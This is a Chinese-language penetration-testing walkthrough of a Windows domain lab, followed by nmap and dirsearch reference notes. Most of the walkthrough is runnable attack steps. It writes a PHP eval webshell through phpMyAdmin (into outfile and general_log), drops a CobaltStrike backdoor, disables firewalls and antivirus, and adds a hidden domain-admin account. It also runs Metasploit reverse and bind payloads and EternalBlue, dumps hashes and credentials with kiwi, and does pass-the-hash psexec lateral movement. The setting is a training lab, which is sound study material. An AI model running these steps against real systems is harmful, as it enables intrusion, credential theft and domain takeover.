目录
环境搭建
ip段设置- kali (coleak):192.168.145.139
- Windows 7 (stu1):192.168.10.181、192.168.145.140
- Winserver 2008 (owa):192.168.10.180
- Win2k3 (root-tvi862ubeh):192.168.10.182
复制代码kali可以访问win7,但不能直接访问win08和win2k3
开启win7 web/mysql服务
信息收集
端口扫描- sudo nmap -sS -p 1-65535 -v 192.168.145.140
复制代码80/tcp open http
3306/tcp open mysql
web目录扫描- dirsearch -u http://192.168.145.140/
复制代码
爆破登录
访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW
bp爆破mysql的root弱口令获得root的密码
进入phpmyadmin,用root/root尝试登录成功
PhpMyAdmin 后台 Getshell
phpmyadmin有两种getshell方式
- into outfile导出木马
- 利用Mysql日志文件getshell
into outfile
需看要secure_file_priv的值。 当value为“null”时,不允许读取任意文件,当value为“空”时,允许读取任意文件,value可也已设置为其他路径。
- select @@basedir; #查看一下网站的路径 C:/phpStudy/MySQL/
- select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/hack.php';
- show global variables like '%secure%'; #secure_auth OFF;secure_file_priv NULL
复制代码当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。所以into outfile写入木马出错。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在[mysqld]内加入secure_file_priv =""。(windows下修改配置文件:mysql.ini linux修改配置文件:my.cnf)
Mysql日志文件写入shell
- show variables like '%general%'; #查看日志状态:
- SET GLOBAL general_log='on'; #开启 general_log
- SET GLOBAL general_log_file='C:/phpStudy/www/hack.php';
- #指定日志写入到网站根目录的 hack.php 文件
- show variables like '%general%';
复制代码 general_logONgeneral_log_fileC:/phpStudy/www/hack.php- SELECT '<?php eval($_POST["cmd"]);?>'; 即可将一句话木马写入 hack.php 文件中
复制代码
CS后渗透
上传免杀后门qm.exe上线cs

关闭防火墙- #注册表开启3389端口
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- #添加防火墙规则
- netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
- #关闭防火墙
- netsh firewall set opmode disable #winsows server 2003 之前
- netsh advfirewall set allprofiles state off #winsows server 2003 之后
- netsh advfirewall show allprofile state //展示状态
- netsh advfirewall set allprofiles state off //关闭防火墙
复制代码 查看用户为god\administrator域管权限,收集域内信息- net view # 查看局域网内其他主机名
- net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
- net user # 查看本机用户列表
- net user /domain # 查看域用户
- net localgroup administrators # 查看本地管理员组(通常会有域用户)
- net view /domain # 查看有几个域(域名获取)
- net user 用户名 /domain # 获取指定域用户的信息
- net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
- net group 组名 /domain # 查看域中某工作组
- net group "domain admins" /domain # 查看域管理员的名字
- net group "domain computers" /domain # 查看域中的其他主机名
- net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
- 网络扫描、端口扫描
复制代码- net view #\\OWA \\ROOT-TVI862UBEH 还有两台主机
复制代码- jump psexec OWA smb
- jump psexec root-tvi862ubeh smb
- 三台主机全部上线
复制代码 选择psexec横向移动

网络拓扑图如下

VPN部署
 - sudo ifconfig phear0 192.168.10.0/24
- ping 192.168.10.180
- nmap 192.168.10.167 -sT -A -p 445
复制代码 代理远程桌面- // 添加test用户net user test p-0p-0p-0 /add /domain
- // 把 test 用户添加进域管理员组net group "domain admins" test /add /domain
- // 查看域管理员net group "domain admins" /domain
- rdesktop 192.168.10.180
- god\test p-0p-0-p-0
复制代码 MSF后渗透
CS派生会话给MSF- use exploit/multi/handler
- set payload windows/meterpreter/reverse_http
- set lhost 192.168.145.139
- set lport 4566
- run
复制代码
新建会话到该新建的监听器
查看主机是否运行在虚拟机上- run post/windows/gather/checkvm
复制代码 关闭掉目标主机的杀毒软件,通过命令- run post/windows/manage/killav
复制代码 获取目标主机的详细信息meterpreter > sysinfo
Computer : STU1
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : GOD
Logged On Users : 3
Meterpreter : x86/windows
Meterpreter支持非常多的文件系统命令(基本跟Linux系统命令类似),一些常用命令如下:- pwd:当前所在位置
- ls:获取当前目录下的文件
- cd:切换目标目录;
- cat:读取文件内容;
- rm:删除文件;
- edit:使用vim编辑文件
- mkdir:新建目录;
- rmdir:删除目录;
- upload file 命令则能够向目标系统上传文件。
- download file 命令可以帮助我们从目标系统中下载文件
复制代码 获取内网网段信息- run get_local_subnets
- # 可以用模块自动添加路由
- run post/multi/manage/autoroute
- #添加一条路由
- run autoroute -s 192.168.10.0/24
- #查看路由添加情况
- run autoroute -p
复制代码Subnet Netmask Gateway
169.254.0.0 255.255.0.0 Session 1
192.168.10.0 255.255.255.0 Session 1
192.168.145.0 255.255.255.0 Session 1
配置并启用隧道- use auxiliary/server/socks_proxy
- set SRVPORT 8999
- setg Proxies socks5:192.168.145.139:8999
- setg ReverseAllowProxy true
复制代码 横向移动- background
- use auxiliary/scanner/portscan/tcp
- set rhosts 192.168.10.181
- set ports 80,135-139,445,3306,3389
- run
复制代码[+] 192.168.10.181: - 192.168.10.181:80 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:135 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:139 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:445 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:3306 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:3389 - TCP OPEN
- set rhosts 192.168.10.182
- run
复制代码[+] 192.168.10.182: - 192.168.10.182:135 - TCP OPEN
[+] 192.168.10.182: - 192.168.10.182:139 - TCP OPEN
[+] 192.168.10.182: - 192.168.10.182:445 - TCP OPEN
有445端口,尝试永恒之蓝ms17-010攻击
漏洞扫描- use auxiliary/scanner/smb/smb_ms17_010
- set rhosts 192.168.10.181
- run
复制代码 利用(内网环境,需要正向shell连接)- use exploit/windows/smb/ms17_010_eternalblue
- set payload windows/x64/meterpreter/bind_tcp
- set rhosts 192.168.10.181
- run
复制代码并没有拿到shell,ms17-010直接拿到shell的情况并不多,成功率不高
哈希传递攻击(PTH)
hashdump- Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
复制代码 ps:ms6中 mimikatz模块已经合并为kiwi模块- load kiwi
- creds_all #列举所有凭据
- creds_kerberos #列举所有kerberos凭据
- creds_msv #列举所有msv凭据
- creds_ssp #列举所有ssp凭据
- creds_tspkg #列举所有tspkg凭据
- creds_wdigest #列举所有wdigest凭据
- dcsync #通过DCSync检索用户帐户信息
- dcsync_ntlm #通过DCSync检索用户帐户NTLM散列、SID和RID
- golden_ticket_create #创建黄金票据
- kerberos_ticket_list #列举kerberos票据
- kerberos_ticket_purge #清除kerberos票据
- kerberos_ticket_use #使用kerberos票据
- kiwi_cmd #执行mimikatz的命令,后面接mimikatz.exe的命令
- lsa_dump_sam #dump出lsa的SAM
- lsa_dump_secrets #dump出lsa的密文
- password_change #修改密码
- wifi_list #列出当前用户的wifi配置文件
- wifi_list_shared #列出共享wifi配置文件/编码
复制代码抓取失败了,emmmm,重新上线cs抓取
- [00000003] Primary
- * Username : Administrator
- * Domain : GOD
- * NTLM : 8a963371a63944419ec1adf687bb1be5
复制代码 psexec|hash传递
在 Metasploit 中,经常使用于哈希传递攻击的模块有:- auxiliary/admin/smb/psexec_command #在目标机器上执行系统命令
- exploit/windows/smb/psexec #用psexec执行系统命令
- exploit/windows/smb/psexec_psh #使用powershell作为payload
复制代码 探测445- use auxiliary/scanner/smb/smb_version
- set rhost 192.168.10.180
- set threads 40
- run
- set rhost 192.168.10.182
- run
复制代码 exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008- use exploit/windows/smb/psexec
- set rhosts 192.168.10.181
- set SMBUser administrator
- set smbpass 00000000000000000000000000000000:8a963371a63944419ec1adf687bb1be5
- run
复制代码 知识补充
nmap
参数分类
主机发现- -sL 仅列出指定网络的每个主机,不发送探测
- -sn 在发现主机后不进行端口探测
- -Pn 将所有主机视为在线,不进行主机发现,由ICMP回显请求、TCP SYN 到端口 443、TCP ACK 到端口 80 和 ICMP 默认情况下的时间戳请求组成
- -PS/-PA/-PU/-PY <port> 对给定端口进行TCP的SYN/ACK,UDP 或 SCTP扫描,参数和端口之间不能有空格
- -PE/-PP/-PM ICMP回显,时间戳和网络掩码请求探测
- -PO <协议列表> 发送具有指定协议编号的IP数据包
- --disable-arp-ping或--send-ip 对于本地以太网上的主机不进行ARP扫描,而是IP地址扫描,默认是ARP
- --discovery-ignore-rst 不理RST回复,有时防火墙会欺骗RST回复,而响应对不存在的地址的探测
- --traceroute 路由跟踪扫描
- -A 此选项设置包含了1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测
- -6 使用IPv6
复制代码 端口扫描- -sU UDP扫描
- -sT TCP扫描
- -sS SYN半开放扫描
- -sN TCP空扫描,如果向关闭端口发送不包含RST的请求,将回复RST作为响应
- -sF FIN标志的数据包扫描
- -b <FTP中继主机> FTP退回扫描(<用户名>:<密码>@<服务器>:<端口>),一种利用FTP服务器的间接扫描
- -sX 圣诞树扫描
- -sA TCP ACK扫描,探测端口是否被防火墙屏蔽
- -sW TCP窗口扫描,这与ACK扫描相同,但通过TCP窗口字段检测端口是否开放,准确率不高
- -sM TCP迈蒙扫描,以起发现者命名
- -sI TCP空闲扫描,一种间接的扫描
- --scanflags <要设置的TCP标注位> 可以自己指定TCP标志位,还可以同时设置TCP扫描类型(-sA,-sF)以告诉nmap如何解释响应
- -sY SCTP INIT扫描即SCTP初始化扫描
- -sZ SCTP COOKIE ECHO扫描,开放的端口将丢弃包含COOKIE ECHO的数据包,但端口是关闭将回复ABORT
- -sO 扫描端口支持的IP协议
- -Pn -sn 跳过主机发现和端口扫描,但仍可以运行NSE(脚本)
- -sP 用类似ping扫描
复制代码 服务和系统探测- -sV Version版本检测扫描, 用来扫描目标主机和端口上运行的软件的版本
- --version-intensity 设置版本扫描的强度0-9,默认7,强度越高准确率越高时间越长
- --version-all 尝试每个强度的探测
- --version-trace 显示详细的版本扫描活动
- --allports 默认nmap版本扫描时不扫一些端口,这将扫所有端口
- -O 操作系统类型的探测
- --osscan-guess(--fuzzy) 猜测匹配操作系统,配合-O
- --osscan-limit 限制Nmap只对有希望确定的主机的进行OS探测(至少需确知该主机分别有一个open和closed的端口)
- --max-os-trys 设置对目标的最大尝试次数,默认5
复制代码 脚本- -sC 默认脚本扫描,即--script=default,这些脚本具有入侵性
- --script <filename>|<category>|<directory>/|<expression>[,...] 每元素首先被解释为表达式,然后被解释为类别,并且 最后作为文件或目录名称。
- --script-args 为脚本提供参数
- --script-args-file <filename> 从文件向脚本通过参数
- --script-help 获取脚本说明
- --script-updatedb 更新找到的脚本数据库
复制代码 设置时序和性能- --min-hostgroup <number>;--max-hostgroup <number> nmap是一次性扫描一个组的主机,这设置一个组的最大和最小自己数
- --host_timeout 设置扫描一台主机的时间,以毫秒为单位,默认无时限
- -T <0-5> 设置时间模版 paranoid (0)、sneaky (1)、polite (2)、normal(3)、 aggressive (4)、insane (5)
- paranoid、sneaky模式用于IDS躲避
- Polite模式降低了扫描速度以使用更少的带宽和目标主机资源。
- Normal为默认模式,因此 -T 3 实际上是未做任何优化。
- Aggressive模式假设用户具有合适及可靠的网络从而加速扫描.
- nsane模式假设用户具有特别快的网络或者愿意为获得速度而牺牲准确性
复制代码 扫描结果- open 端口开放
- closed 端口是关闭
- filtered 端口被防火墙IDS/IPS屏蔽,不能确定状态
- unfiltered 端口没被屏蔽,但是否开放还要进一步确定
- open|filtered 端口是开放或被屏蔽,Nmap不能识别
- closeed|filtered 端口是关闭或被屏蔽,Nmap不能识别
复制代码 设置输出- -oN <文件> 输出到文件
- -oX <文件> 输出到XML文件
- -oG grep-output.txt 扫描的结果输出到屏幕,同时会存储一份到grep-output.txt
- -v(-vv) <级别> 详细输出扫描
- -d <级别> 设置调试级别,当即使是详细模式也无法提供足够的数据时,调试可用于提供更多内容
- --reason 显示主机和端口状态原因
- --open 仅显示打开或可能打开的端口
- -append-output 附加到而不是清空输出文件,为输出格式标志指定文件名时 例如 -oX 或 -oN,即 文件默认被覆盖
复制代码 参数速查表
参数(区分大小写)说明-sTTCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。-sS半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。-sF -sN秘密FIN数据包扫描、Xmas Tree、Null扫描模式-sPping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。-sUUDP扫描,但UDP扫描是不可靠的-sA这项高级的扫描方法通常用来穿过防火墙的规则集-sV探测端口服务版本-Pn扫描之前不需要用ping命令,有些防火墙禁止ping命令。可以使用此选项进行扫描-v显示扫描过程,推荐使用-h帮助选项,是最清楚的帮助文档-p指定端口,如“1-65535、1433、135、22、80”等-O启用远程操作系统检测,存在误报-A全面系统检测、启用脚本检测、扫描等-oN/-oX/-oG将报告写入文件,分别是正常、XML、grepable 三种格式-T4针对TCP端口禁止动态扫描延迟超过10ms-iL读取主机列表,例如,“-iL C:\ip.txt”dirsearch
- 采用默认设置扫描目标url
- python3 dirsearch.py -u https://target
- 使用文件拓展名为php,html,js的字典扫描目标url
- python3 dirsearch.py -e php,html,js -u https://target
- 采用指定路径的wordlist且拓展名为php,html,js的字典扫描目标url
- python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
- 递归扫描
- python3 dirsearch.py -e php,html,js -u https://target -r
- 设置递归层数为3
- python3 dirsearch.py -e php,html,js -u https://target -r -R 3
- 指定线程(不建议线程数调整过大,可能会影响扫描的结果)
- python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
复制代码 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |